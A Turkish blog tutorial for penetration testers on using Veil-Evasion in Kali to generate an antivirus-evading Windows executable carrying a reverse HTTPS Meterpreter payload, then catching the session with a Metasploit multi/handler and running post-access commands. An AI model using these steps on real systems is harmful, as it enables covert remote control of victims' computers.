Kali Üzerinde Veil-Evasion Aracı Kullanılarak Zararlı Uygulama Oluşturma

Sızma testleri sırasında anti-virüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Veil-Evasion adlı anaçatının bir üyesi olan Veil-Evasion aracı kullanılarak antivirüslere yakalanmayan zararlı bir uygulama (exe) dosyası oluşturulacaktır.

Veil-Evasion kurulu bir Kali bilgisayarda Veil-Evasion kurulum dizini (/root/Veil/Veil-Evasion/ gibi) içerisindeki python betiği çalıştırılarak zararlı yazılım oluşturulabilir.

ls
./Veil-Evasion.py

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-01

Betik çalıştırıldıktan sonra, tüm payload çeşitleri listelenebilir.

list

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-02

Şubat 2015 itibari ile yayında olan Veil-Evasion veritabanında 39 adet payload bulunduğu görülmektedir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-03

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-04

Veil-Evasion komut satırında “info” komutundan sonra payload adı veya payload ID değeri girilerek payload hakkında ayrıntılı bilgi edinilebilir.

info 24
info python/meterpreter/rev_https

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-05

Veil-Evasion komut satırında direk olarak payload ID değeri girilerek, “use” komutundan sonra payload adı veya payload ID değeri girilerek kullanılmak istenen payload seçilebilir.

24
use 24
use python/meterpreter/rev_https

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-06

Seçilen payload parametreleri ayarlanarak, payload oluşturulmasına başlanabilir.

set LHOST 192.168.244.146
set LPORT 443
generate

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-07

Veil-Evasion ile oluşturulan dosyaya isim verilir ve python ile oluşturulan zararlı yazılım exe dosyasına çevirilir. Bu adım payload tipine göre değişiklik gösterebilir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-08

Böylece otomatik olarak uygulama oluşur.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-09

Oluşan exe dosyası /usr/share/veil-evasion/compiled dizinine kayıt edilmiştir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-10

Bu dizinde dosyanın olduğu görülmektedir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-11

Ayrıca “/usr/share/veil-evasion/handlers” dizinine bir kaynak dosyası (resource file) kayıt edilmiştir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-12

Bu dosyanın içeriğinde MSF multi-handler istismar modülüne ait seçeneklerin bulunduğu görülmektedir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-13

Hazırlanan zararlı uygulama VirusTotal ile taratıldığında 57 antivirüsten 7 tanesi tarafından tespit edilebileceği görülmektedir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-14

İpucu: Çok etkin bir sonuc vermese de “/usr/share/veil-evasion” dizini altındaki “hashes.txt” dosyası içerisinde oluşan dosyanın özet değeri bulunmaktadır. Bu değer VirusTotal’e verilerek veya Veil-Evasion komut satırındaki “checkvt” komutuna verilerek antivirüsler tarafından daha önceden tespit edilip edilmediği incelenebilir.

checkvt 7cdf8a5b3be020d56a248c56809a3db055129ea3

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-15

Hazırlanan zararlı uygulama çalıştırıldığında, bir talep oluşacaktır. Bu talebin yakalanması için bir MSF multi-handler oluşturulur ve beklenir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.244.146
set LPORT 443
set ExitOnSession false
exploit -j -z

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-16

Zararlı yazılım Windows bir işletim sistemi çalıştırıldığında, Meterpreter bağlantı talebinin MSF multi-handler istismar modülü tarafından yakalandığı görülmektedir.

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-17

Hazırlanan payload ile kullanıcı hakları ile yeni bir proses (Veil-Evasion ile hazırlanan hazırlanan uygulama ile aynı isimde) oluştuğu görülmektedir.

sessions -i 1
getuid
getpid
ps -U Yonetici

evading-anti-virus-detection-for-executables-using-veil-evasion-tool-18

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.